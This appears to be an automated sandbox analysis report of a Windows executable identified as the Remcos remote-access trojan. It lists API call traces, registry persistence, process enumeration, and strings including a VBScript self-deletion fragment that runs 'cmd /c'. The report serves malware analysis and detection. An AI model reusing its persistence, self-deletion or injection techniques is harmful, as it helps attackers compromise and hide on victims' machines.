                                          • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                        • wcslen.MSVCRT ref: 004090DB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                          • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                          • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                          • Part of subcall function 00407E37: CreateDirectoryW.KERNELBASE(00000000), ref: 00407E64
                                          • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                          • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                          • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                          • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                          • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                          • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                          • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                          • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                        • wcscpy.MSVCRT ref: 00409230
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                          • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                          • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                        • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                          • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                          • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                          • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                          • Part of subcall function 0040B708: RegSetValueExA.ADVAPI32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                          • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                          • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                        • atoi.MSVCRT ref: 00409391
                                        • CreateThread.KERNEL32(00000000,00000000,00413B0F,00000000,00000000,00000000), ref: 004093C0
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                        • atoi.MSVCRT ref: 00409540
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                          • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                          • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                          • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                          • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                          • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                          • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                          • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                          • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                          • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                          • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                          • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                          • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                          • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                          • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                        • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                        • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                        • API String ID: 1672879135-3082139352
                                        • Opcode ID: f0ed40f161cef62a835146acbcaa0afe53166bc10613c5bca7ddc65cbc1d354f
                                        • Instruction ID: 756b6b72303f02f0a44bbd524559c36dcc88ee27c0131fa1ad94d22a553bdc8a
                                        • Opcode Fuzzy Hash: f0ed40f161cef62a835146acbcaa0afe53166bc10613c5bca7ddc65cbc1d354f
                                        • Instruction Fuzzy Hash: 5862C572A00648EBDB057BB0AC599FE3B29EB84305F04447EF502A72D2DF784D458B6C
                                        Uniqueness
                                        Uniqueness Score: -1.00%
                                        APIs
                                        • wcslen.MSVCRT ref: 00407E46
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                        • CreateDirectoryW.KERNELBASE(00000000), ref: 00407E64
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407EC2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                        • wcscmp.MSVCRT ref: 00407EE0
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407F1D
                                        • CopyFileW.KERNELBASE(C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,00000000), ref: 00407F25
                                        • wcslen.MSVCRT ref: 00407F40
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00415A24,?), ref: 00407F65
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415A24,?), ref: 00407F72
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F7D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F86
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407F8F
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407FAB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415A24,?), ref: 00407FB4
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407FBE
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,00000000), ref: 00407FC6
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407FD3
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407FE5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408010
                                        • SetFileAttributesW.KERNELBASE(00000000), ref: 0040801D
                                        • wcslen.MSVCRT ref: 00408022
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000007), ref: 00408034
                                        • SetFileAttributesW.KERNELBASE(00000000), ref: 0040803B
                                        • _wgetenv.MSVCRT ref: 0040804B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,?,00415628,0041623C), ref: 004080B0
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
